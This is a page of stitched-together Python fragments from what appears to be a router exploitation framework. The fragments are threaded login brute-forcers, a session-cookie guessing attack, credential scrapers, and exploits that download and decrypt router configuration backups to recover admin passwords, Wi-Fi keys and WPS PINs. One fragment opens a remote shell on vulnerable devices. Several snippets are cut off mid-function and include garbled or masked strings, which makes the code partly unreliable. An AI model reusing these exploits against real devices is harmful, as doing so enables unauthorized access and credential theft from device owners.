            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
    def _deobfuscate(self, config):
        def chain(lambdas, value):
            r_chain = None

            for l in lambdas:
                r_chain = value = l(value)

            return r_chain

        arr_c = [
            chain([
                lambda d: ord(d), lambda d: (d + ord('y')) & 0xff, lambda d:
                (d ^ ord('Z')) & 0xff, lambda d: (d - ord('e')) & 0xff
            ], t) for t in config
        ]

        arr_c_len = len(arr_c)
        tmp = ((arr_c[arr_c_len - 1] & 7) << 5) & 0xff

        for t in reversed(xrange(arr_c_len)):

            if t == 0:
                ct = chain(
                    [lambda d: (d >> 3) & 0xff, lambda d:
                     (d + tmp) & 0xff], arr_c[t])
            else:
                ct = (((arr_c[t] >> 3) & 0xff) +
                      (((arr_c[t - 1] & 0x7) << 5) & 0xff)) & 0xff

            arr_c[t] = ct

        tmp_str = "".join(map(chr, arr_c))
        ret_str = ""

        if len(tmp_str) % 2 != 0:
            print_error("Config file can't be deobfuscated.")
            return None

        for i in xrange(len(tmp_str) / 2):
            ret_str += tmp_str[i + (len(tmp_str) / 2)] + tmp_str[i]

        return ret_str
Beispiel #54
0
    def target_function(self, running, data):
        module_verbosity = boolify(self.verbosity)
        name = threading.current_thread().name
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}

        print_status(name, 'process is starting...', verbose=module_verbosity)

        while running.is_set():
            try:
                user, password = data.next()
                user = user.strip()
                password = password.strip()

                postdata = self.data.replace("{{USER}}", user).replace(
                    "{{PASS}}", password)
                r = requests.post(url,
                                  headers=headers,
                                  data=postdata,
                                  verify=False)
                l = len(r.text)

                if l < self.invalid["min"] or l > self.invalid["max"]:
                    if boolify(self.stop_on_success):
                        running.clear()

                    print_success(
                        "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
                        .format(self.target, self.port, name, user, password),
                        verbose=module_verbosity)
                    self.credentials.append(
                        (self.target, self.port, user, password))
                else:
                    print_error(
                        name,
                        "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
                        .format(self.target, self.port, name, user, password),
                        verbose=module_verbosity)
            except StopIteration:
                break

        print_status(name, 'process is terminated.', verbose=module_verbosity)
 def test_cookie(self, cookie_int):
     """
     Method that tests all cookies from the past to find one that is valid
     """
     url = "{}:{}/html/tUserAccountControl.htm".format(
         self.target, self.port)
     cookies = dict(RpWebID=str(cookie_int))
     try:
         r = http_request(method='GET',
                          url=url,
                          cookies=cookies,
                          timeout=10)
         if ('NAME="OldPwd"' in r.text):
             print_success("Cookie {} is valid!".format(cookie_int))
             pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\""
             password = re.findall(pattern, r.content)[0].replace(
                 '&', ';&')[1:] + ";"
             print_success("Target password is : {}".format(password))
     except Exception:
         print_error("Unable to connect to target")
Beispiel #56
0
 def run(self):
     try:
         if self.check():
             print_success("Target is vulnerable")
             print_status("Invoking command loop...")
             print_status(
                 "Please note that only first 256 characters of the "
                 "output will be displayed.")
             shell(self,
                   architecture="armle",
                   method="wget",
                   location="/tmp")
         else:
             print_error("Target is not vulnerable")
     except socket.error as ex:
         print_error(
             "Socket error ({ex}). It most likely means that something "
             "else is listening locally on port UDP:{port}. Make sure to "
             "kill it before running the exploit again.".format(ex=ex,
                                                                port=9999))
Beispiel #57
0
    def run(self):
        creds = []
        url = "{}:{}/password.cgi".format(self.target, self.port)

        try:
            response = http_request(method="GET", url=url).text
        except AttributeError:
            return

        tokens = [("admin", r"pwdAdmin = '(.+?)'"),
                  ("support", r"pwdSupport = '(.+?)'"),
                  ("user", r"pwdUser = '******'")]

        for token in tokenize(tokens, response):
            creds.append((token.typ, token.value[-1]))

        if creds:
            print_success("Credentials found!")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Credentials could not be found")
    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            url = "{}:{}/goform/system/GatewaySettings.bin".format(
                self.target, self.port)
            response = http_request(method="GET", url=url)

            if response is not None and response.status_code == 200 and "MLog" in response.text:
                print_status("Reading GatewaySettings.bin...")

                plain = self.decrypt_backup(response.text)
                name, pwd = self.parse_backup(plain)

                print_success(
                    'Exploit success! login: {}, password: {}'.format(
                        name, pwd))
            else:
                print_error("Exploit failed. Could not extract config file.")
        else:
            print_error("Target is not vulnerable")
    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            url = "{}:{}/config.bin".format(self.target, self.port)

            print_status("Sending payload request")
            response = http_request(method="GET", url=url)

            if response is not None and response.status_code == 200:
                print_success("Exploit success")
                print_status("Reading file config.bin")
                password, authKey, cPskSecret, cUsrPIN = self.decrypt_config_bin(
                    response.content)
                print_success("Found cPskSecret:" + cPskSecret)
                print_success("Found cUsrPIN:" + cUsrPIN)
                print_success("Found authKey:" + authKey)
                print_success("Password combination from top to bottom:" +
                              '\n' + password)

        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")
    def target_function(self, url, creds):
        name = threading.current_thread().name
        user, password = creds
        user = user.encode('utf-8').strip()
        password = password.encode('utf-8').strip()

        response = http_request(method="GET", url=url, auth=(user, password))

        if response is not None and response.status_code != 401:
            print_success(
                "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
                .format(self.target, self.port, name, user, password),
                verbose=self.verbosity)
            self.credentials.append((self.target, self.port, user, password))
            if self.stop_on_success:
                raise StopThreadPoolExecutor
        else:
            print_error(
                "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
                .format(self.target, self.port, name, user, password),
                verbose=self.verbosity)